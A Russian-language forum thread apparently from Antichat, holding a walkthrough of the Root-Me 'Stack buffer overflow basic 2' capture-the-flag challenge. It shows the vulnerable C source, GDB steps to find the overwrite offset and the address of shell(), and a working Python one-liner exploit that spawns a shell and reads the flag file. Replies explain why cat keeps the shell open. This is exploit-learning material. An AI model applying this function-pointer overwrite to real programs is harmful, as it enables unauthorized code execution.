ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Задания/Квесты/CTF/Конкурсы (https://forum.antichat.xyz/forumdisplay.php?f=112)
-   -   Root-Me, App-System, ELF x86 - Stack buffer overflow basic 2 (https://forum.antichat.xyz/showthread.php?t=1627687)

fuzzz 10.05.2019 16:27
ELF x86 - Stack buffer overflow basic 2

Environment configuration :

PIEPosition Independent Executable

RelRORead Only relocations

NXNon-Executable Stack

Heap execNon-Executable Heap

ASLRAddress Space Layout Randomization

SFSource Fortification

SSPStack-Smashing Protection

SRCSource code access

Source code :

C:


Код:
/*
gcc -m32 -fno-stack-protector -o ch15 ch15.c
*/
#include
#include
void
shell
(
)
{
system
(
"/bin/dash"
)
;
}
void
sup
(
)
{
printf
(
"Hey dude ! Waaaaazzaaaaaaaa ?!\n"
)
;
}
main
(
)
{
int
var
;
void
(
*
func
)
(
)
=
sup
;
char
buf
[
128
]
;
fgets
(
buf
,
133
,
stdin
)
;
func
(
)
;
}
Решение

На этот раз есть харденинг защита в стеке и в куче. Она запрещается выполнять код в этих областях памяти. Но эта защита нам ни чем не мешает. Она просто есть, для того чтобы нельзя было пихнуть свой шеллкод так сказать. Решается это дело тоже очень просто. Суть задачи вызвать функцию shell которая предоставит нам командную оболочку, а затем мы сможем получить флаг.

Запускаем программу под GDB и скармливаем ей строчку сгенерированную с сайта.

Код:
gdb -q ./ch15
r
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
https://forum.antichat.xyz/attachmen...e85b3e762f.png

Получаем адрес смещения 0x33654132

Заходим на сайт и вычисляем смещение

https://forum.antichat.xyz/attachmen...b3785e0532.png

128 байт область смещения.

128+4 вся область которая перезаписывает регистр EIP.

Теперь узнаем адрес функции shell.

Код:
disas shell
q
y,enter.
https://forum.antichat.xyz/attachmen...c8111f0782.png

Функция shell находится в памяти по адресу 0x08048464

Отлично теперь составим эксплойт

Код:
(python -c 'from struct import pack; print "A"*128 + pack("I", 0x08048464)';cat) | ./ch15
cat .passwd
Вот так вот можно взять второй флаг.

NoXuS 20.09.2021 00:00
а чем помогает cat в конце експлоита?

Rook 20.09.2021 00:23
Цитата:

NoXuS сказал(а):

а чем помогает cat в конце експлоита?
cat это команда для чтения файла

NoXuS 20.09.2021 00:26
я не про тот cat
(python -c 'from struct import pack; print "A"*128 + pack("I", 0x08048464)') | ./ch15
(python -c 'from struct import pack; print "A"*128 + pack("I", 0x08048464)';cat) | ./ch15
--------------------------------------------------------------------------------------+++---------
я про этот кат, не могу понять смысла его использования

fuzzz 11.10.2021 17:39
Цитата:

NoXuS сказал(а):

я не про тот cat
(python -c 'from struct import pack; print "A"*128 + pack("I", 0x08048464)') | ./ch15
(python -c 'from struct import pack; print "A"*128 + pack("I", 0x08048464)';cat) | ./ch15
--------------------------------------------------------------------------------------+++---------
я про этот кат, не могу понять смысла его использования
Это обычный cat про который сказали выше. Смысл в том, чтобы оболочка не закрылась.


Время: 12:06